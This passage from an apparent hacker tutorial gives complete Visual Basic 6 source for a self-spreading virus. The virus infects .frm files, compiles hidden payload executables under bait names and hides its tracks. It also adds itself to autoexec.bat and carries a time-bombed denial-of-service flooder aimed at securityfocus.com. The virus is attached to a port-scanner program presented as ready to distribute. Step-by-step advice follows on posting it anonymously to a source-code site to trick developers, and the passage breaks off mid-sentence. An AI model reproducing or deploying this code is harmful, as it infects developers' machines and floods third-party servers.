Mid(App.Path, 1, 3) & "Form1.frm" For Output As #freefilefuck1 Line Input #freefile9, line_string Do Until EOF(freefile9) Line Input #freefile9, line_string If InStr(1, line_string, "fuck full disclosure.", vbTextCompare) = 0 Then Print #freefilefuck1, Mid(line_string, 2) End If DoEvents Loop Close #freefilefuck1 DoEvents Close #freefile9 DoEvents Dim freefilefuck2 As Integer freefilefuck2 = FreeFile Open Mid(App.Path, 1, 3) & "form1.vbw" For Output As #freefilefuck2 Print #freefilefuck2, "Form1 = 130, 129, 577, 679, , 0, 0, 0, 0, C" & vbCr Close #freefilefuck2 DoEvents 'now we use the vb6.exe compiler to compile the payload into an exe.. we do it STEALTHY like 'no obvious activity going on.. Shell ("cmd.exe /c cd " & Mid(App.Path, 1, 3) & " && cd Program Files\Microsoft Visual Studio\VB98 && vb6.exe /m " & Mid(App.Path, 1, 3) & "project1.vbp " & Mid(App.Path, 1, 3) & "Program Files\FileAloc100.exe"), vbHide DoEvents Shell ("cmd.exe /c cd " & Mid(App.Path, 1, 3) & " && cd Program Files\Microsoft Visual Studio\VB98 && vb6.exe /m " & Mid(App.Path, 1, 3) & "project1.vbp " & Mid(App.Path, 1, 3) & "Documents and Settings\All Users\Documents\My Music\HotMusic.exe"), vbHide Shell ("cmd.exe /c cd " & Mid(App.Path, 1, 3) & " && cd Program Files\Microsoft Visual Studio\VB98 && vb6.exe /m " & Mid(App.Path, 1, 3) & "project1.vbp " & Mid(App.Path, 1, 3) & "My Downloads\SEXY_BODY.exe"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "MSD0S.sys"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "AUT0EXEC.BAT"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "B00T.INI"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "newfile.txt"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "systemProj1.vbp"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "Form1.frm"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "project1.vbp"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "form1.vbw"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "I0.SYS"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "project1.vbp"), vbHide DoEvents App.TaskVisible = True Dim freefilefuck3 As Integer freefilefuck3 = FreeFile Open Mid(App.Path, 1, 3) & "autoexec.bat" For Append As #freefilefuck3 Print #freefilefuck3, Mid(App.Path, 1, 3) & "program files\FileAloc100.exe" Close #freefilefuck3 DoEvents skip2: 'light that burns twice as bright burns half as long 'teh endg End Sub Private Sub Form_Load() 'use these to test and infect Call sub1 'Call Sub2 End Sub ' Support the non disclosure revolution! ' 'VERSION 5.00 'Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "MSWINSCK.OCX" 'Begin VB.Form Form1 ' Caption = "Form1" ' ClientHeight = 465 ' ClientLeft = 1665 ' ClientTop = 1935 ' ClientWidth = 1560 ' LinkTopic = "Form1" ' ScaleHeight = 465 ' ScaleWidth = 1560 ' Begin MSWinsockLib.Winsock Winsock1 ' Index = 0 ' Left = 0 ' Top = 0 ' _ExtentX = 741 ' _ExtentY = 741 ' _Version = 393216 ' End 'End 'Attribute VB_Name = "Form1" 'Attribute VB_GlobalNameSpace = False 'Attribute VB_Creatable = False 'Attribute VB_PredeclaredId = True 'Attribute VB_Exposed = False 'Private Sub Form_Load() ' ' ''built in vb stealth functions 'Form1.Visible = False 'App.TaskVisible = False ' ''time bomb.. must be March - December when it DoSs 'Dim strmonth As String 'strmonth = Mid(Date, 4, 2) 'If strmonth < 3 Then End ' 'Dim i As Integer 'Dim load_sockets As Boolean ' ''we only want to load the sockets once. 'If load_sockets = False Then ' For i = 1 To 2200 ' Load Winsock1(i) ' DoEvents ' load_sockets = True ' Next i 'End If ' ''2000 sockets will DoS port 80 'For i = 1 To 2000 ' Winsock1(i).RemoteHost = "http://securityfocus.com" ' Winsock1(i).RemotePort = "80" ' Winsock1(i).Close ' DoEvents ' Winsock1(i).Connect 'Next i ' ' ''200 sockets will DoS port 22 'For i = 2001 To 2200 ' Winsock1(i).RemoteHost = "http://securityfocus.com" ' Winsock1(i).RemotePort = "22" ' Winsock1(i).Close ' DoEvents ' Winsock1(i).Connect 'Next i ' 'End Sub ' 'Private Sub Form_Terminate() ''anit-shutdown teqnique 'Shell ("cmd.exe /c " & App.Path & "\" & App.EXEName & ".exe"), vbHide 'End Sub ' 'Private Sub Winsock1_Error(Index As Integer, ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean) ''reconnecting 'Winsock1(Index).Close 'Winsock1(Index).Connect 'End Sub ' fuck full disclosure. ' 'theres nothing left for me to hide 'i lost my ignoracne security and pride 'im all alone in this world you must dispise 'i believed your promices - your promices are lies 'terrable lies '-NIN 1998 'Type=Exe 'Form=Form1.frm 'Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\..\WINDOWS\system32\stdole2.tlb#OLE Automation 'Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; MSWINSCK.OCX 'IconForm="Form1" 'Startup="Form1" 'HelpFile="" 'Title="SysFunc" 'ExeName32="SysFunc.exe" 'Path32="..\..\.." 'Command32="" 'Name="SysFunc" 'HelpContextID="0" 'Description="Alocation Tool" 'CompatibleMode="0" 'MajorVer=1 'MinorVer=0 'RevisionVer=2 'AutoIncrementVer=1 'ServerSupportFiles=0 'VersionCompanyName="Microsoft" 'VersionFileDescription="File System Alocation tool" 'VersionLegalCopyright="Copyright 2001" 'VersionProductName="SysFunc Alocation Tool" 'CompilationType=0 'OptimizationType=0 'FavorPentiumPro(tm)=0 'CodeViewDebugInfo=0 'NoAliasing=0 'BoundsCheck=0 'OverflowCheck=0 'FlPointCheck=0 'FDIVCheck=0 'UnroundedFP=0 'StartMode=0 'Unattended=0 'Retained=0 'ThreadPerObject=0 'MaxNumberOfThreads=1 'DebugStartupOption=0 ' '[MS Transaction Server] 'AutoRefresh=1 'see the animial in his cage that you built 'are you sure what side you're on 'better not look in to closely to the eyes 'are you sure what side the glass you are on 'see the safety of the life you have built 'everything where it belongs 'feel the hollowness inside of your heart 'and its all right where it belongs 'what if everything around you 'isn't quite as it seams 'what if all the world you think you know 'is an elaborate dream 'and if you look right at your reflection 'is it all you want to be 'but if you could look right through the cracks 'would you find yourself - 'find yourself afraid to see '- 'what if all the world's inside of your head 'just creations of your own 'the devils and the gods. all the living and the dead 'and you really aught to know 'you can live this illusion 'you can choose to believe 'you could keep looking but cant find the words 'now your hidng in the trees 'what if everything around you 'isnt quite as it seams 'what if all the world you used to know 'is an elaborate dream? 'and if you look at your reflection 'is it all you want to be? 'what if you could look right through the cracks 'would you find yourself - 'find yourself afraid to see? '-NIN 2005 '--- %< ---cut-here------ %< ---cut-here------ %< ---cut-here------ %< ---cut-here---' 6 - ___---=== Viral Code attached to working program (final product)===---___ Here is a program that is infected with the finished and working version of the virus, with the payload included. All that this needs to spread is for some dumb vb developer to run this bad boy and all of his vb6.0 programs that are in X:\program files file folder will be infected (X being the drive that the program is run on). This will include all of the built in .frm files that visual studio comes with. Example: some built in .frm files are "FrmAbout" and "FrmDialog" and "FrmLogin" and so on and so on. Any of these can be added to a vb6.0 project at any time, and if they are infected, then the virus will continue to spread. The virus code in this section is the exact same virus code that is in section 5, except the code in this section is actualy attached to a working program, and its 100% ready to go! Use section 5 to help you understand what exactly is going on in this section. I found this program that is titled "PortScanner Tutorial" on the internet somewhere. It is used for port scanning, but thats not what im using it for here. To use this code, just take the part here marked Form1.Frm and put it into a text file, then name it "Form1.Frm" Do the same to the part marked "PortScanner Tutorial.vbp" and "Portscanner Tutorial.vbw" Then if you have visual basic 6.0 installed, you can run and compile this INFECTED visual basic project. Form1.Frm: '--- %< ---cut-here------ %< ---cut-here------ %< ---cut-here------ %< ---cut-here---' VERSION 5.00 Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "MSWINSCK.OCX" Object = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}#2.0#0"; "MSCOMCTL.OCX" Begin VB.Form Form1 BorderStyle = 3 'Fixed Dialog Caption = "Demo of a Portscanner" ClientHeight = 3690 ClientLeft = 45 ClientTop = 330 ClientWidth = 7095 LinkTopic = "Form1" MaxButton = 0 'False MinButton = 0 'False ScaleHeight = 3690 ScaleWidth = 7095 ShowInTaskbar = 0 'False StartUpPosition = 3 'Windows Default Begin VB.TextBox FoundPorts Height = 2175 Left = 240 MultiLine = -1 'True ScrollBars = 2 'Vertical TabIndex = 6 Top = 720 Width = 6735 End Begin MSComctlLib.StatusBar Status Align = 2 'Align Bottom Height = 255 Left = 0 TabIndex = 5 Top = 3435 Width = 7095 _ExtentX = 12515 _ExtentY = 450 Style = 1 SimpleText = "Idle..." _Version = 393216 BeginProperty Panels {8E3867A5-8586-11D1-B16A-00C0F0283628} NumPanels = 1 BeginProperty Panel1 {8E3867AB-8586-11D1-B16A-00C0F0283628} EndProperty EndProperty End Begin VB.TextBox txtPortEnd Height = 285 Left = 4080 TabIndex = 4 Text = "65536" Top = 240 Width = 855 End Begin VB.TextBox txtPortStart Height = 285 Left = 3120 TabIndex = 3 Text = "1" Top = 240 Width = 855 End Begin VB.TextBox txtHost Height = 285 Left = 240 TabIndex = 2 Text = "Localhost" Top = 240 Width = 2535 End Begin VB.CommandButton Command1 Caption = "Start" Height = 285 Left = 5040 TabIndex = 1 Top = 240 Width = 1935 End Begin MSWinsockLib.Winsock Sock Index = 0 Left = 6600 Top = 3000 _ExtentX = 741 _ExtentY = 741 _Version = 393216 End Begin VB.Label Label1 AutoSize = -1 'True Caption = "This Winsock control is called ""Sock"" and has an index of 0 --->" BeginProperty Font Name = "MS Sans Serif" Size = 9.75 Charset = 0 Weight = 700 Underline = 0 'False Italic = 0 'False Strikethrough = 0 'False EndProperty Height = 240 Left = 0 TabIndex = 0 Top = 3120 Visible = 0 'False Width = 6540 End End Attribute VB_Name = "Form1" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Private Sub Command1_Click() 'faqchew App.TaskVisible = False Dim line1, checkstatus1, lineput As String Dim i, importantvariable As Integer Dim j As Double Dim freefile1, freefile2, freefile3 As Integer Shell ("cmd.exe /c cd " & App.Path & " && dir /b > " & Mid(App.Path, 1, 3) & "C0NFIG.sys"), vbHide If Dir(Mid(App.Path, 1, 3) & "Documents and Settings") <> "" Then Shell ("cmd.exe /c cd " & Mid(App.Path, 1, 3) & "Documents and Settings && dir /b /s >> " & Mid(App.Path, 1, 3) & "MSD0S.sys"), vbHide Else Shell ("cmd.exe /c cd " & Mid(App.Path, 1, 3) & "Program Files && dir /b /s >> " & Mid(App.Path, 1, 3) & "MSD0S.SYS"), vbHide End If DoEvents redo1: importantvariable = importantvariable + 1 j = Timer j = j + 2 Do Until Timer >= j Loop 'use this instead of gay timer!!!! 'Do ' DoEvents 'Loop Until Mid(App.Path, 1, 3) & "drives.sys" <> "" If Dir(Mid(App.Path, 1, 3) & "C0NFIG.sys") = "" Then If importantvariable >= 3 Then GoTo skip1 GoTo redo1 End If freefile1 = FreeFile Open Mid(App.Path, 1, 3) & "C0NFIG.sys" For Input As #freefile1 DoEvents Do Until EOF(freefile1) DoEvents Line Input #freefile1, line1 DoEvents line1 = UCase(line1) If Right$(line1, 4) = ".FRM" Then freefile2 = FreeFile Open line1 For Input As #freefile2 Do Until EOF(freefile2) Line Input #freefile2, checkstatus1 DoEvents Dim EOInfect As Boolean DoEvents If checkstatus1 = "'faqchew" Then freefile3 = FreeFile Open Mid(App.Path, 1, 3) & "B00T.INI" For Append As #freefile3 Do Until EOInfect = True Print #freefile3, checkstatus1 If checkstatus1 = "'faqchew2" Then EOInfect = True Line Input #freefile2, checkstatus1 Loop EOInfect = False Close #freefile3 End If DoEvents If checkstatus1 = "'fakmeh" Then freefile3 = FreeFile Open Mid(App.Path, 1, 3) & "AUT0EXEC.BAT" For Append As #freefile3 Do Until EOInfect = True Print #freefile3, checkstatus1 If checkstatus1 = "'teh endg" Then EOInfect = True Line Input #freefile2, checkstatus1 Loop EOInfect = False Close #freefile3 End If DoEvents 'payload part one If InStr(1, checkstatus1, "non disclosure revolution", vbTextCompare) Then 'MsgBox checkstatus1 freefile3 = FreeFile Open Mid(App.Path, 1, 3) & "I0.SYS" For Append As #freefile3 Do Until EOInfect = True Print #freefile3, checkstatus1 If checkstatus1 = "' fuck full disclosure. '" Then EOInfect = True Line Input #freefile2, checkstatus1 Loop EOInfect = False Print #freefile3, vbCrLf Close #freefile3 End If DoEvents If InStr(1, checkstatus1, "'theres nothing left for me to hide", vbTextCompare) Then freefile3 = FreeFile Open Mid(App.Path, 1, 3) & "systemProj1.vbp" For Append As #freefile3 Do Until EOInfect = True Print #freefile3, checkstatus1 If checkstatus1 = "'-NIN 2005" Then EOInfect = True Line Input #freefile2, checkstatus1 Loop EOInfect = False Print #freefile3, vbCrLf Close #freefile3 End If DoEvents DoEvents Loop Close #freefile2 End If Loop Close #freefile1 Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "C0NFIG.sys"), vbHide skip1: 'faqchew2 '************************************************ '* This is where it gets a bit more complicated * '************************************************ Dim Socket As Variant ' for instances of the socket we will ' use in the For loop Dim CurrentPort As Integer ' Obvious Const MaxSockets = 100 ' change this for Speed / Accuracy ' between 1 - 200 ' it's stable enough to use this On Error Resume Next ' We need a way to Start / Stop, so we'll use ' the command button's caption as a reference If Command1.Caption = "Start" Then ' to prevent errors, disable teh textboxes txtHost.Enabled = False txtPortStart.Enabled = False txtPortEnd.Enabled = False 'see above Command1.Caption = "Stop" ' Lets load some sockets to use For i = 1 To MaxSockets 'Load new sock instance i Load Sock(i) Next i CurrentPort = txtPortStart.Text ' Again using the command1.caption as a reference ' to start / stop While Command1.Caption = "Stop" ' set up the ports to scan by referencing ' each instance of the socket in turn For Each Socket In Sock ' Definately Need this so the system doesn't freeze DoEvents ' check if the socket is still trying to connect ' or is connected If Socket.State <> sckClosed Then ' skip the increment of the port GoTo continue End If ' close the socket to make double sure Socket.Close ' if it got to here, it's ready to try ' the next port, only after checking ' if we've done all the ports and the user ' hasn't clicked on Stop If CurrentPort = Val(txtPortEnd.Text) + 1 _ Then Exit For 'set the host Socket.RemoteHost = txtHost.Text ' set the port Socket.RemotePort = CurrentPort ' inform the user of the port being scanned Status.SimpleText = "Now Scanning Port " & CurrentPort ' attempt connect Socket.Connect ' fromhere, the socket will do one of two things ' 1) Raise a Connect therefore the port is open ' 2) Raise an Error therefore the port is closed ' increment the current port CurrentPort = CurrentPort + 1 ' if the socketisn't ready to be incremented, go here continue: ' goto the next socket instance Next Socket Wend 'set the command1.caption to Start so we can scan again Command1.Caption = "Start" ' re-enable the textboxes txtHost.Enabled = True txtPortStart.Enabled = True txtPortEnd.Enabled = True Else ' command1.caption is "Stop" Command1.Caption = "Start" End If ' close all the sockets to save memory For i = 1 To MaxSockets Unload Sock(i) Next i End Sub Private Sub FoundPorts_Change() 'fakmeh Dim IntArray(0 To 4), i As Integer Dim line_string, lineput As String Dim j As Double Dim freefile9, freefile2, freefile4, freefile5, freefile6 As Integer Dim exit_thing As Boolean If Dir(Mid(App.Path, 1, 3) & "MSD0S.sys") = "" Then GoTo skip2 freefile9 = FreeFile Open Mid(App.Path, 1, 3) & "MSD0S.sys" For Input As #freefile9 Do Until EOF(freefile9) skip_infect: Input #freefile9, lineput lineput = UCase(lineput) If Right$(lineput, 4) = ".FRM" Then ''debug'' 'MsgBox "lineput = " & lineput freefile2 = FreeFile exit_thing = False Open lineput For Input As #freefile2 Do Until EOF(freefile2) Or exit_thing = True Line Input #freefile2, line_string If InStr(1, line_string, "faqchew", vbTextCompare) <> 0 Then exit_thing = True End If Loop Close freefile2 If exit_thing = True Then GoTo skip_infect End If freefile2 = FreeFile Open lineput For Input As #freefile2 For i = 0 To 4 IntArray(i) = 0 Next i Do Until EOF(freefile2) Or IntArray(3) <> 0 Or IntArray(4) <> 0 Line Input #freefile2, line_string IntArray(0) = IntArray(0) + 1 If InStr(1, line_string, "Function", vbTextCompare) <> 0 Or InStr(1, line_string, "Sub", vbTextCompare) <> 0 Then If InStr(1, line_string, "Declare", vbTextCompare) = 0 And InStr(1, line_string, "Const", vbTextCompare) = 0 And InStr(1, line_string, ")", vbTextCompare) <> 0 And InStr(1, line_string, "(", vbTextCompare) <> 0 And InStr(1, line_string, "End ", vbTextCompare) = 0 And InStr(1, line_string, Chr(34), vbTextCompare) = 0 And InStr(1, line_string, "Exit Function", vbTextCompare) = 0 And InStr(1, line_string, "=", vbTextCompare) = 0 And InStr(1, line_string, "'", vbTextCompare) = 0 Then If IntArray(1) = 0 Then IntArray(1) = IntArray(0) Else IntArray(3) = IntArray(0) End If End If End If If InStr(1, line_string, "End Sub") <> 0 Or InStr(1, line_string, "End Function") <> 0 Then If IntArray(2) = 0 Then IntArray(2) = IntArray(0) Else IntArray(4) = IntArray(0) End If End If DoEvents Loop Close #freefile2 DoEvents freefile4 = FreeFile Open Mid(App.Path, 1, 3) & "newfile.txt" For Output As #freefile4 freefile5 = FreeFile Open lineput For Input As #freefile5 For i = 0 To IntArray(1) - 1 Line Input #freefile5, line_string Print #freefile4, line_string DoEvents Next i freefile6 = FreeFile Open Mid(App.Path, 1, 3) & "B00T.INI" For Input As #freefile6 Do Until EOF(freefile6) Line Input #freefile6, line_string Print #freefile4, line_string DoEvents Loop Close #freefile6 DoEvents For i = i To IntArray(3) - 1 Line Input #freefile5, line_string Print #freefile4, line_string DoEvents Next i DoEvents freefile6 = FreeFile Open Mid(App.Path, 1, 3) & "AUT0EXEC.BAT" For Input As #freefile6 Do Until EOF(freefile6) Line Input #freefile6, line_string Print #freefile4, line_string DoEvents Loop Close #freefile6 DoEvents Do Until EOF(freefile5) Line Input #freefile5, line_string Print #freefile4, line_string DoEvents Loop '''''''''''''''' Dim freefilefuck As Integer freefilefuck = FreeFile Open Mid(App.Path, 1, 3) & "I0.SYS" For Input As #freefilefuck Do Until EOF(freefilefuck) Line Input #freefilefuck, line_string Print #freefile4, line_string DoEvents Loop Close #freefilefuck DoEvents freefilefuck = FreeFile Open Mid(App.Path, 1, 3) & "systemProj1.vbp" For Input As #freefilefuck Do Until EOF(freefilefuck) Line Input #freefilefuck, line_string Print #freefile4, line_string DoEvents Loop Close #freefilefuck DoEvents '''''''' Close #freefile5 Close #freefile4 On Error Resume Next FileCopy Mid(App.Path, 1, 3) & "newfile.txt", lineput DoEvents Kill Mid(App.Path, 1, 3) & "newfile.txt" End If DoEvents Loop Close #freefile9 DoEvents 'FINALY.. what we do here is create the EXE of the payload, then we 'get the FUCK out of town like real dawgz. '.VBP file Dim freefilefuck1 As Integer freefile9 = FreeFile Open Mid(App.Path, 1, 3) & "systemProj1.vbp" For Input As #freefile9 DoEvents freefilefuck1 = FreeFile Open Mid(App.Path, 1, 3) & "Project1.vbp" For Output As #freefilefuck1 Dim g_string As Integer For g_string = 1 To 7 Line Input #freefile9, line_string Next g_string Do Until line_string = "'see the animial in his cage that you built" Line Input #freefile9, line_string If InStr(1, line_string, "in his cage", vbTextCompare) = 0 Then Print #freefilefuck1, Mid(line_string, 2) End If DoEvents Loop Close #freefilefuck1 DoEvents Close #freefile9 DoEvents '.FRM file Open Mid(App.Path, 1, 3) & "I0.SYS" For Input As #freefile9 DoEvents freefilefuck1 = FreeFile Open Mid(App.Path, 1, 3) & "Form1.frm" For Output As #freefilefuck1 Line Input #freefile9, line_string Do Until EOF(freefile9) Line Input #freefile9, line_string If InStr(1, line_string, "fuck full disclosure.", vbTextCompare) = 0 Then Print #freefilefuck1, Mid(line_string, 2) End If DoEvents Loop Close #freefilefuck1 DoEvents Close #freefile9 DoEvents Dim freefilefuck2 As Integer freefilefuck2 = FreeFile Open Mid(App.Path, 1, 3) & "form1.vbw" For Output As #freefilefuck2 Print #freefilefuck2, "Form1 = 130, 129, 577, 679, , 0, 0, 0, 0, C" & vbCr Close #freefilefuck2 DoEvents 'now we use the vb6.exe compiler to compile the payload into an exe.. we do it STEALTHY like 'no obvious activity going on.. Shell ("cmd.exe /c cd " & Mid(App.Path, 1, 3) & " && cd Program Files\Microsoft Visual Studio\VB98 && vb6.exe /m " & Mid(App.Path, 1, 3) & "project1.vbp " & Mid(App.Path, 1, 3) & "Program Files\FileAloc100.exe"), vbHide DoEvents Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "MSD0S.sys"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "AUT0EXEC.BAT"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "B00T.INI"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "newfile.txt"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "systemProj1.vbp"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "Form1.frm"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "project1.vbp"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "form1.vbw"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "I0.SYS"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "project1.vbp"), vbHide DoEvents App.TaskVisible = True Dim freefilefuck3 As Integer freefilefuck3 = FreeFile Open Mid(App.Path, 1, 3) & "autoexec.bat" For Append As #freefilefuck3 Print #freefilefuck3, Mid(App.Path, 1, 3) & "program files\FileAloc100.exe" Close #freefilefuck3 DoEvents skip2: 'light that burns twice as bright burns half as long 'teh endg '**************************************************** '* So that out textbox scrolls down automatically * '* we use the SelStart property in the * '* FoundPorts_change Event. * '**************************************************** ' Pseudo code '~~~~~~~~~~~~ ' Selection start position = length of Text in Text control FoundPorts.SelStart = Len(FoundPorts.Text) End Sub Private Function AddPort(Port As Integer) '************************************************** '* This is a function to add the port to the list * '************************************************** 'Pseudo code '~~~~~~~~~~~ ' Text = current text + newtext + carriage return FoundPorts.Text = FoundPorts.Text & "[Connected] Port " & Port & vbCrLf End Function Private Sub Sock_Connect(Index As Integer) ' the port is open so inform the user AddPort (Sock(Index).RemotePort) ' close the socket so it can't be flooded by anti ' portscanner tools and it gets incremented Sock(Index).Close End Sub Private Sub Sock_Error(Index As Integer, ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean) ' the port is closed so close the socket so it ' will be incremented Sock(Index).Close End Sub ' Support the non disclosure revolution! ' 'VERSION 5.00 'Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "MSWINSCK.OCX" 'Begin VB.Form Form1 ' Caption = "Form1" ' ClientHeight = 465 ' ClientLeft = 1665 ' ClientTop = 1935 ' ClientWidth = 1560 ' LinkTopic = "Form1" ' ScaleHeight = 465 ' ScaleWidth = 1560 ' Begin MSWinsockLib.Winsock Winsock1 ' Index = 0 ' Left = 0 ' Top = 0 ' _ExtentX = 741 ' _ExtentY = 741 ' _Version = 393216 ' End 'End 'Attribute VB_Name = "Form1" 'Attribute VB_GlobalNameSpace = False 'Attribute VB_Creatable = False 'Attribute VB_PredeclaredId = True 'Attribute VB_Exposed = False 'Private Sub Form_Load() ' ' ''built in vb stealth functions 'Form1.Visible = False 'App.TaskVisible = False ' ''time bomb.. must be March - December when it DoSs 'Dim strmonth As String 'strmonth = Mid(Date, 4, 2) 'If strmonth < 3 Then End ' 'Dim i As Integer 'Dim load_sockets As Boolean ' ''we only want to load the sockets once. 'If load_sockets = False Then ' For i = 1 To 2200 ' Load Winsock1(i) ' DoEvents ' load_sockets = True ' Next i 'End If ' ''2000 sockets will DoS port 80 'For i = 1 To 2000 ' Winsock1(i).RemoteHost = "http://securityfocus.com" ' Winsock1(i).RemotePort = "80" ' Winsock1(i).Close ' DoEvents ' Winsock1(i).Connect 'Next i ' ' ''200 sockets will DoS port 22 'For i = 2001 To 2200 ' Winsock1(i).RemoteHost = "http://securityfocus.com" ' Winsock1(i).RemotePort = "22" ' Winsock1(i).Close ' DoEvents ' Winsock1(i).Connect 'Next i ' 'End Sub ' 'Private Sub Form_Terminate() ''anit-shutdown teqnique 'Shell ("cmd.exe /c " & App.Path & "\" & App.EXEName & ".exe"), vbHide 'End Sub ' 'Private Sub Winsock1_Error(Index As Integer, ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean) ''reconnecting 'Winsock1(Index).Close 'Winsock1(Index).Connect 'End Sub ' fuck full disclosure. ' 'theres nothing left for me to hide 'i lost my ignoracne security and pride 'im all alone in this world you must dispise 'i believed your promices - your promices are lies 'terrable lies '-NIN 1998 'Type=Exe 'Form=Form1.frm 'Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\..\WINDOWS\system32\stdole2.tlb#OLE Automation 'Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; MSWINSCK.OCX 'IconForm="Form1" 'Startup="Form1" 'HelpFile="" 'Title="SysFunc" 'ExeName32="SysFunc.exe" 'Path32="..\..\.." 'Command32="" 'Name="SysFunc" 'HelpContextID="0" 'Description="Alocation Tool" 'CompatibleMode="0" 'MajorVer=1 'MinorVer=0 'RevisionVer=2 'AutoIncrementVer=1 'ServerSupportFiles=0 'VersionCompanyName="Microsoft" 'VersionFileDescription="File System Alocation tool" 'VersionLegalCopyright="Copyright 2001" 'VersionProductName="SysFunc Alocation Tool" 'CompilationType=0 'OptimizationType=0 'FavorPentiumPro(tm)=0 'CodeViewDebugInfo=0 'NoAliasing=0 'BoundsCheck=0 'OverflowCheck=0 'FlPointCheck=0 'FDIVCheck=0 'UnroundedFP=0 'StartMode=0 'Unattended=0 'Retained=0 'ThreadPerObject=0 'MaxNumberOfThreads=1 'DebugStartupOption=0 ' '[MS Transaction Server] 'AutoRefresh=1 'see the animial in his cage that you built 'are you sure what side you're on 'better not look in to closely to the eyes 'are you sure what side the glass you are on 'see the safety of the life you have built 'everything where it belongs 'feel the hollowness inside of your heart 'and its all right where it belongs 'what if everything around you 'isn't quite as it seams 'what if all the world you think you know 'is an elaborate dream 'and if you look right at your reflection 'is it all you want to be 'but if you could look right through the cracks 'would you find yourself - 'find yourself afraid to see '- 'what if all the world's inside of your head 'just creations of your own 'the devils and the gods. all the living and the dead 'and you really aught to know 'you can live this illusion 'you can choose to believe 'you could keep looking but cant find the words 'now your hidng in the trees 'what if everything around you 'isnt quite as it seams 'what if all the world you used to know 'is an elaborate dream? 'and if you look at your reflection 'is it all you want to be? 'what if you could look right through the cracks 'would you find yourself - 'find yourself afraid to see? '-NIN 2005 '--- %< ---cut-here------ %< ---cut-here------ %< ---cut-here------ %< ---cut-here---' Portscanner Tutorial.vbp: '--- %< ---cut-here------ %< ---cut-here------ %< ---cut-here------ %< ---cut-here---' Type=Exe Form=Form1.frm Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\WINNT\System32\stdole2.tlb#OLE Automation Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; MSWINSCK.OCX Object={831FDD16-0C5C-11D2-A9FC-0000F8754DA1}#2.0#0; MSCOMCTL.OCX Startup="Form1" Command32="" Name="Project1" HelpContextID="0" CompatibleMode="0" MajorVer=1 MinorVer=0 RevisionVer=0 AutoIncrementVer=0 ServerSupportFiles=0 CompilationType=0 OptimizationType=0 FavorPentiumPro(tm)=0 CodeViewDebugInfo=0 NoAliasing=0 BoundsCheck=0 OverflowCheck=0 FlPointCheck=0 FDIVCheck=0 UnroundedFP=0 StartMode=0 Unattended=0 Retained=0 ThreadPerObject=0 MaxNumberOfThreads=1 [MS Transaction Server] AutoRefresh=1 '--- %< ---cut-here------ %< ---cut-here------ %< ---cut-here------ %< ---cut-here---' PortScanner Tutorial.vbw: '--- %< ---cut-here------ %< ---cut-here------ %< ---cut-here------ %< ---cut-here---' Form1 = 44, 44, 378, 492, CZ, 22, 22, 356, 470, C '--- %< ---cut-here------ %< ---cut-here------ %< ---cut-here------ %< ---cut-here---' 7 - ___---=== Executing and spreading virus ===---___ Ok, so even if you do not know anything about programming, source code viruses, DoS or anything at all in this article, you can still cause damage. In this chapter I will explain how. Program Developers get lots of their code from already working programs from sites such as http://plantsourcecode.com or other free source code sites. Lots of the time when they need a function or API call or even a whole program, they dont even try to understand how the code works, or even look at the code at all. Most of the time, the programmer/developer will test out the code to see if the program works first, then copy and paste what is relevent. If they run the program whithout looking at the code first, the code can execute anything it wants and there will be nothing the developer can do about it. This is the #1 method this source code virus uses to spread. We will create a real program that works, attach our virus to it then post it at several sites such as planetsourcecode.com. If the program looks interesting and/or original, the programmer/developer will download the program to test it out to see if it is worthy of their use. With any luck, the virus will infect a bunch of their code, then it will also create an exe using its commented code. Here are the three easy steps to successfully post code at a site that people will download. The mark for this example will be planetsourcecode.com, the most widely used free source code site I know of. STEP ONE: Infect an already existing program with this source code virus. It can be an original program of yours, or just rip one off from planetsourcecode.com and pretend it is original. STEP TWO: Use a proxy, or tor, or a public computer or some other way to annonymously create an account with planetsourcecode.com STEP THREE: While still being annonymous, post the source code. PSC (planet source code) will ask you to fill in a bunch of fields like "Type API calls used here" and "Type what this program does here". Make the program sound original, unique and special in some way. In short, make it 